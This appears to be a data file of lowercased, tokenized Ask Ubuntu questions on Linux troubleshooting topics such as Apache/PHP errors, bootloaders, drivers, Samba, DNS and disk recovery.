479390	apache does n't load .php files	first , sorry for my english and asking something that it 's quite answered all over the web . i 've read a lot of post about this problem but i still ca n't find the solution . i 'm a web developer who recently moved to ubuntu from windows 7 . i had a website done ( it 's online and working ) and i set up lamp to keep working with it . i made a test.php file with : < ? php phpinfo ( ) ; ? > and put it on /var/www/html directory , it shows all the information about the php and i was really happy : `` ok , it 's all done , tomorrow i will work hard '' but i placed my whole web into /var/www/html , not in a folder , the index.php is in /var/www/html but guess what : does n't load any of my .php files , the browser just keep thinking . what i did : i rebooted apache : /etc/init.d/apache2 restart i tried again with the test.php file and it works fine i put in /var/www/html a .html file and works fine . i looked for /etc/apache2/sites-enable/000-default.conf and it says : documentroot /var/www/html i looked for /etc/apache2/mods-enabled/dir.conf and it says : directoryindex index.html index.cgi index.pl index.php ... edit* i think it 's something related to phpmyadmin , like if i 'm not able to connect with the database . but i got nothing on the screen when trying to load the page so ... i 'm not sure . i can access to the url localhost/phpmyadmin and i edited the connection.php file like this : < ? php # filename= '' connection_php_mysql.htm '' # type= '' mysql '' # http= '' true '' $ hostname_rakstadconnection = `` localhost '' ; $ database_rakstadconnection = `` rakstadclandb '' ; $ username_rakstadconnection = `` root '' ; $ password_rakstadconnection = `` admin '' ; $ rakstadconnection = mysql_connect ( $ hostname_rakstadconnection , $ username_rakstadconnection , $ password_rakstadconnection ) or trigger_error ( mysql_error ( ) , e_user_error ) ; mysql_query ( `` set names 'utf8 ' '' ) ; ? > the name of the database is correct , like the user and password . http : //i89.photobucket.com/albums/k220/haddex/capturadepantallade2014-06-09112609_zpsc45ddb72.png http : //i89.photobucket.com/albums/k220/haddex/capturadepantallade2014-06-09112120_zps0b9e15f7.png *edit2 : could this be because it 's a website that i brought to linux from windows ? i used dreamweaver . edit3 : i changed the # to /*/ , nothing . the error.log file says : [ mon jun 09 17:08:13.627881 2014 ] [ : error ] [ pid 1517 ] [ client 127.0.0.1:46663 ] php warning : require_once ( /var/www/html/connections/rakstadconnection.php ) : failed to open stream : permission denied in /var/www/html/index.php on line 1 [ mon jun 09 17:08:13.627933 2014 ] [ : error ] [ pid 1517 ] [ client 127.0.0.1:46663 ] php fatal error : require_once ( ) : failed opening required 'connections/rakstadconnection.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in /var/www/html/index.php on line 1 i 'm reading error log but ... should i add a linux path into a my index.php file ? do n't think so . thanks .
479393	i need install burg in my pc and i have some problems	i have some problems : i got anger at ubuntu and uninstalled it ( i have already installed windows 8.1 ) now i cant access my hard drive because of my fast boot feature in windows . now i thought of reinstalling ubuntu to access my hard drive , but while installing it only shows 3 partitions of linux i cant find the windows 's partitons , my fear is that it shows all the space including the space occupied by windows where i have to install ubuntu ( i mean if i install ubuntu i am afraid that my windows data will be deleted . ) i have a live usb of ubuntu and i need to install burg on my pc ( please provide me a step-by-step instruction ) if you need any additional info , tell me . and i have a efi file of burg
479395	every time to boot my system , the brightness get reset to 100 %	earlier , i could n't even change the screen brightness by any means ( fn keys and brightness settings ) .then i came across a solution , which required me to edit the following lines file : /etc/grub.d/10_linux changes : edit $ 4 to args=âacpi_backlight=vendor $ 4âł this enabled me to change the screen brightness , but it is reset to 100 % on every reboot . i have tried installing xbacklight , it just does n't work .
479403	in case of multi-arch same with debconf db_purge does n't delete the template entries completely	in case multi-arch , when installing create binary 32-bit .deb package on amd64 machine , debconf creates 2 template entries debconf-get-selections | grep productname packagename packagename/accepted-license boolean true packagename : i386 packagename/accepted-license boolean true in the postrm script we have introduced db_purge to clear of the entries when uninstall if [ `` $ 1 '' = purge ] & & [ -e /usr/share/debconf/confmodule ] ; then . /usr/share/debconf/confmodule db_purge fi this uninstalls only the : i386 entries leaving behind other entries packagename packagename/accepted-license boolean true this causes any new install to not display the license agreement . could you please help understand why there are 2 entries created for each template , and how these can be cleaned off during uninstall ?
479404	wifi mobile router problems	i have been using ubuntu for a month now , and i am facing some problems with my wifi connection . the problem is that when i connect to my mobile wifi router it works fine for 10 minutes , and after that the internet disappears for a couple of minutes and reappears again . it 's been happening constantly when i am connected to huawei e5776s-32 model , but when i am at home and connected to my home router everything works fine . every time i connect to it i get this kind of message : network service discovery disabled . your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disabled . maybe someone knows how to fix this small problem ?
479406	touchegg at ubuntu gnome 14.04 , multi touch not working	i 've installed touchegg via sudo apt-get install touchegg , and also touchegg-gce . and i am using apple magic trackpad . my problem is three ( or four , five ) touch is not responded , and my cursor stop responding . but one and two finger works fine . is there ways for me to debug ( find out reason ) ? i 've search around internet but still confused . thanks !
479407	vnc not connecting from some networks	while not strictly a ubuntu problem i am using ubuntu 12.04 with a vnc connection into a raspberry pi which , i understand are both debian based , so i hope you do n't mind this slight deviation ... . i have tight vnc loaded on my raspberry pi and it works using my ubuntu laptop or from my android device , but only from some locations . ie ; it works from my local community centre , my friends house and an internet cafe in town . it does n't work from mcdonalds , the local library , bunnings free wifi . when it does n't work i get the error `` no rout to device '' why is n't it consistent - can you help ? brian
479411	bind9 resolve virtual machine	i have bind9 running on my laptop . and i have a debian on virtual machine . the virtual machine is vmware and installed on the same laptop . how can i make bind9 to resolve my virtual debian address ? debian address is 172.18.20.135 and i added it in bind9 like this www in a 172.18.20.135 bind seems can not resolve it
479414	command-line : create new partition using the largest continuous free space	i want a shell script to create a new partition on /dev/sdb using all the available partitioned space , without touching existing partitions . my aim would be to create a new encrypted luks partition , but using cryptsetup luksformat /dev/sdb would format the whole disk . using something like : cryptsetup luksformat /dev/sdb2 is no option since /dev/sdb2 does not yet exists , since we have one partition and the rest is unpartitioned space . so my plan was to create an partition first and then pass that partition as option to cryptsetup luksformat /dev/sdb < number > , but i can not figure out a clean and easy way to create a new partition using all unused space on a device . programs i had a look at : parted and fdisk . for example ubiquity installer allows the option d-i partman-auto/init_automatically_partition select biggest_free which would do what i need , when i pass a recipe after that . any ideas how to achieve that in a script ?
479415	ugly noises randomly from certain applications ( pulsing static , and watery noise )	i 'm getting random problems with the sound on my desktop pc . i 'm running it through hdmi on my nvidia card but also have optical and analogue connections on the motherboard which i am not using ( and would happily disable if possible ) . i keep randomly getting static pulsing noises when sound is played , but it 's not constant . i can load several applications fine , and then run something else and it will fail . i can then load the same app and it will work , sometime i need to reboot to fix it . i 've tried blacklisting a few unused sound drivers but it did n't help . the main ubuntu page for this was not helpful : https : //help.ubuntu.com/community/soundtroubleshooting thanks , chris
479416	can root chown anything ?	so i have a duplicity-based backup script which is run periodically as root thanks to anacron . it runs as root because i 'm backing up about the whole file system ( save for /tmp , /sys , etc ) , and also because anacron makes it uneasy to have user related jobs ( even though i know `` quick '' workarounds exist ) my concern is that since the backup is run as root , the files are owned by root , and every subsequent operation on the backups ( like duplicity verify ) also needs root access to happen . i have no problem with having to sudo to check the integrity of the backup or to occasionally recover a file , but here comes my question : assuming my system completely dies , and i 'm only left with the backups , will i be able , as the root of another system to chown or chmod 644 those backups files owned by a now `` dead '' root in order to recover my data ?
479418	why applications do not always run in foreground when started from terminal ?	if i start an application from terminal normally it runs in the foreground . so it is possible to suspend the application ( with ctrl+z ) , look to the jobs and put it back to foreground again with fg ( similar described at this answer http : //askubuntu.com/a/172667/265974 ) . but if i start an application first with alt+f2 then start another instance of this application from the terminal , this instance will not run in foreground and i cant find it with the jobs command . is it possible to set this application to foreground even if it is not find with jobs ?
479419	osx terminal send zipped file to directory	i would like to zip the contents of a flash drive using this terminal command : zip -r archive_name.zip folder_to_compress the problem is , the flash drive is almost full , so i would like to make a zipped copy of it , but save the zipped copy in another directory . is this possible ? if so , how can i do this ? if you down vote , please tell me why so i can improve this question .
479422	services are not registered but running in the background	i have openstack installed using devstack on ubuntu server 12.04 . i want manually start/stop openstack 's services like nova and cinder etc . here is the question where i asked how do i start/stop services and i was told that openstack services are not registered but are running ... my question is that how do i register services with os while they are even running in the background . when i do ps -aux | grep nova , it shows nova-api and others too but i get unrecognized service when i run service nova-api status . also there is no nova in /etc/init.d/ : (
479426	old disk in new machine gave error : could n't find device with uuid	i 'm running zimbra email server on ubbuntu server 10.4 as vm , we got an issue with vm as it was not able to startup . i installed fresh copy of ubuntu server 12.4 , when i 'm trying to add disks of old machine to the new created one , but i 'm getting below error : root @ ubuntu-test : /etc/lvm/archive # pvscan could n't find device with uuid c5fn4s-iupy-ijqa-qrua-e9tb-gbin-eg12k9 . pv unknown device vg backup_vg lvm2 [ 20.00 gib / 0 free ] pv /dev/sdb1 vg backup_vg lvm2 [ 899.99 gib / 1016.00 mib free ] pv /dev/sda5 vg ubuntu-test lvm2 [ 15.76 gib / 24.00 mib free ] total : 3 [ 935.75 gib ] / in use : 3 [ 935.75 gib ] / in no vg : 0 [ 0 ] root @ ubuntu-test : /etc/lvm/archive # vgscan reading all physical volumes . this may take a while ... could n't find device with uuid c5fn4s-iupy-ijqa-qrua-e9tb-gbin-eg12k9 . found volume group `` backup_vg '' using metadata type lvm2 found volume group `` ubuntu-test '' using metadata type lvm2 root @ ubuntu-test : /etc/lvm/archive # vgchange -ay backup_vg could n't find device with uuid c5fn4s-iupy-ijqa-qrua-e9tb-gbin-eg12k9 . refusing activation of partial lv backup . use -- partial to override . 0 logical volume ( s ) in volume group `` backup_vg '' now active root @ ubuntu-test : /etc/lvm/archive # blkid /dev/sda1 : uuid= '' adf7ff7e-63c5-45ef-bc84-47808d74e093 '' type= '' ext2 '' /dev/sda5 : uuid= '' 2tvj3z-lyav-2ela-oknt-fhaa-4i2h-8vrltb '' type= '' lvm2_member '' /dev/sdb1 : uuid= '' 2amhaf-8xmv-ubyg-a3am-dhtk-puyv-9gnrod '' type= '' lvm2_member '' /dev/mapper/ubuntu -- test-root : uuid= '' b229338a-0279-430e-8659-d148bec4e980 '' type= '' ext4 '' /dev/mapper/ubuntu -- test-swap_1 : uuid= '' 035a04a7-3ada-453a-8355-2c1ae7b23db6 '' type= '' swap '' please how can i mount this disk once again in order to get what 's inside .
479433	windows installation on top of ubuntu	there seems to be a lot of questions on askubuntu and info on the web on how to install ubuntu and windows in dual boot , but everywhere ubuntu is installed afterwards . i would like to install windows on the system which is already running ubuntu . it uses uefi and has free space on hdd so it is possible to arrange a partition for windows without much trouble . on mbr based systems it was possible as long as you copy mbr and restore it after windows installation . is it possible on a uefi system ? will i have any problems ?
479436	question about tidy	i just installed geany ide when i tried to compile html file i got error /bin/sh : 1 : tidy : not found can someone help
479438	battery power when running ubuntu 14.04 lts in dual boot	this is only a general question in order for me to get a better idea of my dual boot ( windows 8 & ubuntu ) systems . i noticed that every time i run ubuntu ( which is becoming more often ) the battery power gets consumed really fast . i am not performing any special tasks at the moment , just getting to know the system , for example , sound settings , watching videos , surfing the net and so on . when i do the same thing in windows 8 the battery lives a considerable amount of time longer . is this something to do with ubuntu or is it because of the dual boot that i have going on ? in other words , if i start running ubuntu all by itself on my laptop , will it be more power consuming than windows 8 ?
479440	pxe m0f and efi boot problem after ubuntu 14.04 install through efi	i just recently installed ubuntu 14.04 on my lenovo g500 , i am a bit new to terminal . i previously had windows 8 ( my laptop came with free dos per-installed ) on my laptop and decide to change it with ubuntu . i booted through efi using a normal installation disc ( normal booting did not respond to the disc ) . the installation went without a single error but the problems started after the first boot , after the install i only have ubuntu installed and no other os ! i started getting the following error : intel undi , pxe-2.0 ( build 083 ) copyright ( c ) 1997 - 2000 intel corporation for atheros pcie ethernet controller v2.0.2.3 ( 05/18/10 ) check cable connection ! pxe-m0f : exiting intel pxe rom . and that is it ! it does not ask me insert a boot-media like in the other question and the grub loads up after this and i only get 3 options ubuntu advanced options ( this is where is get the recovery option ) system setting ( a.k.a bios setting ) and after this is ubuntu loads normally . i ca n't boot through any other now as my efi is occupied by ubuntu and also if i try to boot through my dvd-rom it gives me the pxe m0f error and loads the grub again . note : i previously had the low graphics mode issue and solved it using nomodeset . i would like to solve the pxe m0f error so that i can install windows or maybe reinstall ubuntu again neatly ! thanks in advance for all your support !
479441	kubuntu + kdm blank desktop	i recently did a sudo apt-get install kubuntu-desktop . reboot loaded a kubuntu splash screen , then loaded the unity desktop . i read you needed kdm to handle the log in screen , so i did sudo apt-get install kdm . reboot took me to a kdm login , but i ca n't do anything with the computer . alt+f2 does n't work , ca n't open a terminal , all i can do is move my mouse around . tried booting in recovery mode and doing sudo dpkg-reconfigure light-dm , but it says read only file system . ubuntu 14.04 . it 'd be nice if kubuntu worked , but i 'd be happy with getting unity back at this point . can anyone help ? thanks
479443	gnome-shell + clone monitors	first of all , sorry for my english . i 've ubuntu ( 14.04 ) with gnome-shell ( 3.10 ) installed and i would like to get both monitors in mirror mode on startup . currently , i have to go to system settings - > monitors to turn on the mirror mode each time i run my computer . i think the most confortable approach is creating a bash script with such configuration ( enabling monitor mirroring ) and install it as a startup app . my problem is i do n't know which gsettings options is changed when i select the mirroring option .
479444	ubuntu 14.10 , mint 17 disappeared from boot after installing centos 6 and vice versa	i have an intel i5 laptop with 150gb space and partitioned into 3 parts . ubuntu 14.10 lts 64-bit and mint 17 cinnamon 64-bit installed in 2 separate partitions . the grub 2 bootloader works fine . then i installed centos 6 64-bit into the third separate partition by using an usb boot drive containing centos 6 only . after successful installation the machine was reboot and i can only found the centos 6 in the grub bootloader . both ubuntu and mint could not be loaded from the bootloader . i know that i have probably replaced the grub2 with grub . i have reinstalled the grub using the centos 6 usb boot drive following the command of the centos wiki http : //wiki.centos.org/tipsandtricks/reinstallgrub . the rescue mode was chosen after the usb boot . i have run the command : # chroot /mnt/sysimage but i could not run the following scripts : # grub-install /dev/sda # grub-install /dev/sda2 then i reboot the machine and only i found grub2 reappeared in the boot screen . however this time the centos 6 was gone . is there any way i could be able to choose all the 3 linux distros in the same boot screen ? i am a newbie to linux and therefore i would like to know the reason of the above happening ?
479448	moved a vbox guest to a physical host ; network is up , but openssh is not . why ?	i 've come a cross an issue i really do n't understand . i wanted to install ubuntu server on a headless box i have . the desktop sits right next to it , and adding and removing disks are very easy , so i just created a virtualbox image for the disk using vboxmanage internalcommands createvmdk -filename ~/phys-disk.vmdk -rawdisk /dev/sdb . the virtual machine boots just fine , everything works exacty as expected and i install ubuntu server 14.04lts . networking is configured to bridged and i can ping the host from the outside . i install openssh-server and i can connect from other devices as well as the host . in other words , everything is fine . then i shutdown the vm , remove the disk , insert it into the server and reboot it . it 's the only disk connected . after a while , the server starts answering to pings . however , it no longer responds to port 22 . when i move it back to the vm host , everything is working again and then back at the server , sshd does n't reply . for the life of me , i ca n't figure out the cause of this . because the vm host and the server are both directly connected to the same switch . the only thing i can think of , is that sshd somehow refuses to open ports when the nic 's mac changes , but i ca n't find any such setting . i do n't believe i 've ever encounted this on earlier versions of ubuntu , but then i 'm also not sure if i 've ever installed it that way before . any ideas ?
479453	how can i combine 'srm ' and 'find ' ?	i 'm using srm to securely delete files and directories . most of the data is on fat and ntfs volumes since i dualboot with windows ( i 'm trying to use ubuntu as much as possible and stay away from windows ) . however every now and then i run into an error error : file < filepath > - file is hardlinked 1 time ( s ) , skipping ! which i discovered means there 's a hardlink to the file . i did some searching and found the non-srm way to delete all linked files is with the command ( example : ) $ sudo find ~ -xdev -samefile '/home/username/desktop/hardlinks ( copy ) .txt ' | xargs rm unfortunately the above does n't work if i replace `` srm '' for `` rm '' ... error : file /home/username/desktop/hardlinks - no such file or directory error : file ( copy ) .txt - no such file or directory error : file /home/username/desktop/links.txt - file is hardlinked 1 time ( s ) , skipping ! is there a way to achieve the same result : search for hard links for a specific file , then process them through srm ? preferably with the arguments -rvz ( recursive , verbose , overwrite with zero ) ? note : i also tried appending -print0 to find and/or -0 to xargs which did n't help
479456	convert .mp4 to .ogg keeping only the audio , with ubuntu 14.04 and avconv	how to convert a .mp4 file ( downloaded from youtube ) to .ogg ? ( keeping only the audio ) when ubuntu had ffmpeg i could just do ffmpeg -i file.mp4 -acodec vorbis file.ogg now we have to do without ffmpeg , but avconv seems to have a different syntax : $ avconv -i file.mp4 -nv file.ogg unrecognized option 'nv ' . error splitting the argument list : option not found
479460	replacing kernel on non-booting ec2 instance	so i had an amazon ec2 instance crash during the update to 14.04lts . frustratingly , it appears the kernel might be bad ( or at least that 's what the log below says to me , i could totally be wrong ) . i 'm able to mount the volume to another , working server , chroot the broken volume , and sudo apt-get remove linux-headers-3.mostrecent . unfortunately though , when i try sudo update-grub , it comes back with /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . what am i missing ? here 's the log from the server 's attempted bootup : [ h [ j booting 'ubuntu 14.04 lts , memtest86+' root ( hd0 ) filesystem type is ext2fs , using whole disk kernel /boot/memtest86+.bin ============= init tpm front ================ tpmfront : error unable to read device/vtpm/0/backend-id during tpmfront initialization ! error = enoent tpmfront : info shutting down tpmfront xc : error : panic : xc_dom_core.c:621 : xc_dom_find_loader : no loader found : invalid kernel xc_dom_parse_image returned -1 close ( 3 ) error 9 : unknown boot failure press any key to continue ... thanks in advance !
479462	apt-get install was interrupted	i am new to ubuntu . i got the following lines after an interrupted apt-get install . running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-29-generic /boot/vmlinuz-3.13.0-29-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-29-generic /boot/vmlinuz-3.13.0-29-generic update-initramfs : generating /boot/initrd.img-3.13.0-29-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.13.0-29-generic /boot/vmlinuz-3.13.0-29-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.13.0-29-generic /boot/vmlinuz-3.13.0-29-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.13.0-29-generic /boot/vmlinuz-3.13.0-29-generic /usr/sbin/grub-mkconfig : 14 : /etc/default/grub : nouveau.modeset=0 : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-29-generic.postinst line 1025 . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : error processing package linux-image-3.13.0-29-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-29-generic : linux-image-extra-3.13.0-29-generic depends on linux-image-3.13.0-29-generic ; however : package linux-image-3.13.0-29-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-29-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.13.0-29-generic ; however : package linux-image-3.13.0-29-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.13.0-29-generic ; however : package linux-image-extra-3.13.0-29-generic is not configured yet . dpkg : error processing package linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.13.0.29.35 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing package linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-27-generic : linux-image-extra-3.13.0-27-generic depends on linux-image-3.13.0-27-generic ; however : package linux-image-3.13.0-27-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-27-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-signed-image-3.13.0-29-generic : linux-signed-image-3.13.0-29-generic depends on linux-image-3.13.0-29-generic ( = 3.13.0-29.53 ) ; however : package linux-image-3.13.0-29-generic is not configured yet . linux-signed-image-3.13.0-29-generic depends on linux-image-extra-3.13.0-29-generic ( = 3.13.0-29.53 ) ; however : package linux-image-extra-3.13.0-29-generic is not configured yet . dpkg : error processing package linux-signed-image-3.13.0-29-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-signed-image-generic : linux-signed-image-generic depends on linux-signed-image-3.13.0-29-generic ; however : package linux-signed-image-3.13.0-29-generic is not configured yet . dpkg : error processing package linux-signed-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-signed-generic : linux-signed-generic depends on linux-signed-image-generic ( = 3.13.0.29.35 ) ; however : package linux-signed-image-generic is not configured yet . dpkg : error processing package linux-signed-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-signed-image-3.13.0-27-generic : linux-signed-image-3.13.0-27-generic depends on linux-image-3.13.0-27-generic ( = 3.13.0-27.50 ) ; however : package linux-image-3.13.0-27-generic is not configured yet . linux-signed-image-3.13.0-27-generic depends on linux-image-extra-3.13.0-27-generic ( = 3.13.0-27.50 ) ; however : package linux-image-extra-3.13.0-27-generic is not configured yet . dpkg : error processing package linux-signed-image-3.13.0-27-generic ( -- configure ) : dependency problems - leaving unconfigured setting up libxkbcommon-x11-0 : amd64 ( 0.4.1-0ubuntu1 ) ... setting up libqt5gui5 : amd64 ( 5.2.1+dfsg-1ubuntu14.2 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... errors were encountered while processing : linux-image-3.13.0-27-generic linux-image-3.13.0-29-generic linux-image-extra-3.13.0-29-generic linux-image-generic linux-generic linux-image-extra-3.13.0-27-generic linux-signed-image-3.13.0-29-generic linux-signed-image-generic linux-signed-generic linux-signed-image-3.13.0-27-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
479465	how to disable alt-scroll zoom in xubuntu 14.04	in xubuntu 14.04 , alt+scroll wheel zooms my entire desktop . i 'm finding this very annoying because sometimes i flick the scroll wheel to go to the top of a document then press the alt key for a some unrelated keyboard shortcut and find myself zoomed in so far i ca n't see anything at all . is there any way to disable this feature ?
479468	how do i start unity manually upon boot ?	i recently installed ubuntu 14.04 lts and i was wondering how could i start the gui manually upon booting the system . for example , i 'd like the system to start at a black tty screen , it asks for my credentials and password , then i can start the gui manually .
479470	loader does n't recognise my hdd	i installed ubuntu as a dual system with windows 7 . when i start the machine is tells me that my hard drive is not recognised so i can not use either system . i can run ubuntu using the dvd trial , then my hdd and partitions are all available .
479478	question about sts installation	i downloaded sts 64 bit version , but not sure what are the steps to install on ubuntu 12.04 can someone help
479481	amd catalyst beta open source drivers	i 'm a gamer with a pretty low-end computer , so i always update to the beta drivers to squeeze out every bit of performance i can get . i currently have 13.3 installed , but i want to install the 14.6 beta . i want to use the open source version , instead of downloading from amd 's website . how can i do that in the terminal ? and please explain what the commands mean so i can do it on my own in the future . thanks in advance !
479487	how can i use reinersct standard chipcard reader with jameica/hibiscus in ubuntu 14.04 64bit ?	i want to use a `` reinersct standard '' chipcard reader with the jameica/hibiscus homebanking suite . i installed `` pcsc-lite '' and the `` libifd-cyberjack6 '' package , and if i run pcscd -d -f i can see the card reader is discovered correctly and also detects when i insert or remove a chipcard . however in jameica , whatever i do the card reader is not found . what am i missing ?
479491	how to install mac os theme for ubuntu ?	how to install mac os theme in ubuntu 14.04 ? i searched all of google but no proper results on mac os theme for ubuntu all i get is mac-buntu which has unity and does n't look like mac at all . help me i want to get mac theme in my ubuntu as i can not install mac on pc
479496	questions about mac book pro keyboard and shortcuts	i have been researching a lot about this and i can not seem to find any useful information about this topic , what so ever . i have now been using ubuntu in one week , and have gotten pretty confident with almost everything . except keyboard layout and shortcuts . if you know a tutorial or a documents explaining keyboard shortcuts in ubuntu or linux in general , can you please list it ? i use a mac book pro with a norwegian keyboard , and i have several questions about this : is there a program for having a consist list of absolutely all keyboard shortcuts , and be able to change them ? how do i use my fn keys ? ( fn button does n't do the job for some reason ) how can i use my alt+letter-key-or-number-key or alt+shift+letter-key-or-number-key to get fancy characters . ( like i do on mac os x ) how can i swap cmd and ctrl key system wide ? also i really want to be oriented around this subject , since this is the only thing holding me back on ubuntu , so if there exists some in-depth material on this , it would be great . also , if there exists some programs or material out there making it easier with mac hardware i would enjoy that .
479500	how to activate a dialogue box on suspend ?	i am using 14.04 with unity . quite regularly it happens to me that i want to shutdown the computer , but in the right corner menu i accidently hit suspend in stead of shutdown . is it possible to add a dialogue box on the suspend menu ? so that i do n't always have to come back from suspend to finally shutdown afterwards . or is it possible to make the shutdown button like 3 times bigger than the suspend button ?
479505	why is samba not adding a new user with `` samba-tool '' ?	i 'm trying to configure a samba share on my dell poweredge 860 running server 14.04 lts . samba came uninstalled ( when i chose it ) , so i just need to configure it . i 'm trying to connect it to my windows machine . my config file ( listed below ) seems to be valid . i do n't get any errors with it . it 's a modified version of something i found on a tutorial online . [ global ] workgroup = home server string = samba ubuntu server map to guest = bad user log file = /var/log/samba/log. % m max log size = 50 socket options = tcp_nodelay so_rcvbuf=8192 so_sndbuf=8192 local master = no dns proxy = no idmap config * : backend = tdb [ queue ] comment = `` a small folder to move files from/to the server . for use by server admin . '' path = /serv/samba/queue valid users = penguin read only = no create mask = 0777 directory mask = 0777 that 's all fine there . ( i should note that i have an account named penguin , too , but i want all the users to be configured using samba-tool because penguin is the only user account that will be on it , and there will be more users than there is now ) . penguin @ ubuntu-server-1 : ~/serv/samba $ sudo samba-tool user add penguin new password : retype password : error ( < type 'exceptions.valueerror ' > ) : failed to add user 'penguin ' : - unable to parse dn string file `` /usr/lib/python2.7/dist-packages/samba/netcmd/user.py '' , line 176 , in run uid=uid , uidnumber=uid_number , gidnumber=gid_number , gecos=gecos , loginshell=login_shell ) file `` /usr/lib/python2.7/dist-packages/samba/samdb.py '' , line 343 , in newuser dnsdomain = ldb.dn ( self , self.domain_dn ( ) ) .canonical_str ( ) .replace ( `` / '' , `` '' ) i 've tried it also with another username that 's not on the system . it does n't work . i ca n't even accomplish a simple sudo samba-tool user list without errors ! error ( ldb ) : uncaught exception - ldb_search : invalid basedn ' ( null ) ' file `` /usr/lib/python2.7/dist-packages/samba/netcmd/__init__.py '' , line 175 , in _run return self.run ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/samba/netcmd/user.py '' , line 271 , in run attrs= [ `` samaccountname '' ] ) what am i doing wrong ?
479506	override dns nameserver	i wish to set higher priority for my dns nameservers , or override the ones that are being set by the dhcp server . no matter which approach i took , nslookup never displays the right dns nameserver . please see the snippet below . $ cat /etc/*release* | grep -i dist distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04 lts '' resolvconf : $ cat /etc/resolvconf/resolv.conf.d/base nameserver 208.67.222.222 nameserver 208.67.220.220 $ sudo resolvconf -- enable-updates $ sudo resolvconf -u $ nslookup > server default server : 127.0.1.1 address : 127.0.1.1 # 53 dhcp : $ tail -n 1 /etc/dhcp/dhclient.conf supersede domain-name-servers 208.67.222.222 , 208.67.220.220 ; $ sudo service networking restart $ nslookup > server default server : 127.0.1.1 address : 127.0.1.1 # 53 how it can be done ? ?
479511	pwmconfig no longer detecting sensors since reinstalling 14.04	my computer has a asus p8h61-m pro motherboard and i was previously able to use fancontrol to control the fanspeeds . it detected the sensors as w83627ehf . i 've recently reinstalled xubuntu 14.04 as i wanted a fresh installation and i wanted to rearrange my partitions . sensors-detect is now telling me to use nct6775 . i 've used modprobe to load up nct6775 but when i run pwmconfig it tells me `` there are no pwm-capable sensor modules installed '' and sensors only lists the coretemp temperatures . if i try to modprobe w83627ehf it tells me `` device or resource busy '' . i 've tried installing the latest versions from https : //github.com/groeck/nct6775 to no avail . it 's slightly frustrating that all of this was working fine before i reinstalled , so i know that it has to be possible , but i just need to get the right version of something from somewhere . does anybody have any suggestions for next things to check please ?
479516	system freezes-hangs for up to 10 minutes or longer	starting with ubuntu 12.04 , and now with ubuntu 14 , i have issues with machine freezing in the middle of use . originally noticed it using mozilla ff and then noticed it began happing with other programs . did some searching and found issues with nvidia and amd so i changed machines and went with intel , same problems still occuring . either i reboot or wait about ten minutes in order for it to begin working correctly . any suggestions where to look as i 'm not finding resolutions to this issue that seems to be happening to several others . amphibian
479530	is there a way to save exactly what windows are open ?	i wont to be able to log out and log in and my windows will be there with all my stuff open . i was thinking its got ta be something to do with .xsessions but i do n't know very well . im using dwm so i didnt know if you need a specific window manager .
479535	ad hoc network between ms windows and ubuntu	i 've tried to make ad hoc network on my windows machine and use another ubuntu machine to connect on it . but ubuntu can not see this network . is there any way to make this ?
479541	how can i share a folder between ubuntu 13.10 as host os and windows 8.1 as guest in virtualbox ?	i installed windows 8.1 pro as guest os in virtualbox . i want to share a folder between ubuntu 13.10 as my host os and guest os for file transfer between them . how can i do that ? thanks
479546	how do i remove home folder that shows up on desktop ?	i do n't know what i did but the next time i boot up my laptop , i find this home folder on the desktop . how did it get here ? i want to delete the folder . left click does not show the option to delete it ? how do i do it ? here 's a screenshot .
480537	can not access/delete folder in rubbish bin containing hundred of thousand of corrupted files on 14.04	yesterday i discovered a folder in the trash bin named fdtn0bhkrx containing more than 700,000 corrupted files . i know the approximate number because i tried to move the folder to a usb key , and when i cancelled the operation , the `` preparing to move.. '' dialogue was showing that mark . the folder is 1017mb and the files inside are all 0 byte long . i tried everything i could to remove this folder or to access it , but i failed . sudo rm or sudo su and then rm with -d and -f options goes in infinite loop , which may cause a complete block of the system 's functions ( including ctrl+alt+del ) . i even coded a c++ program , which works great on other folders , but in this case it failed miserably . i searched all over the web and i could n't find any other case like my one . the files inside the folder are named something like this : s __fro__ kj i could read some of the names one of the times i tried to open the folder in nautilus , because before the program crashed , if i clicked the back button , some of the files icons were rendered together with their name . the only command i can use on the folder is mv afik . thanks in advance for your help .
